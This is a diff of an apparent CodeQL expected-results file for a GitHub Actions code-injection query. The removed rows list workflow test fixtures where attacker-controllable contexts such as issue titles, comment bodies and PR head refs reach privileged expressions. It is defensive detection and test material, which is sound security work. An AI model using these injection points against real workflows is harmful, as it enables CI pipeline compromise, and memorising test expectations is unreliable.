@@ -256,100 +259,80 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} |
-| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} |
-| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} |
-| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} |
-| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} |
-| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} |
-| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} |
-| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} |
-| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} |
-| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} |
-| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} |
-| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} |
-| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} |
-| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} |
-| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} |
-| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} |
-| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} |
-| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} |
-| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} |
-| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} |
-| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} |
-| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} |
-| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} |
-| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
-| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} |
-| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} |
-| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} |
-| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} |
-| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} |
-| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} |
-| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} |
-| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} |
-| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} |
-| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} |
-| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} |
-| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} |
-| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} |
-| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} |
-| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} |
-| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} |
-| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} |
-| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} |
-| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} |
-| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} |
-| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} |
-| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} |
-| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} |
-| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} |
-| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} |
-| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} |
-| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} |
-| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} |
-| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} |
-| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} |
-| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} |
-| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} |
-| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} |
-| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} |
-| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} |
-| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} |
-| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} |
-| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} |
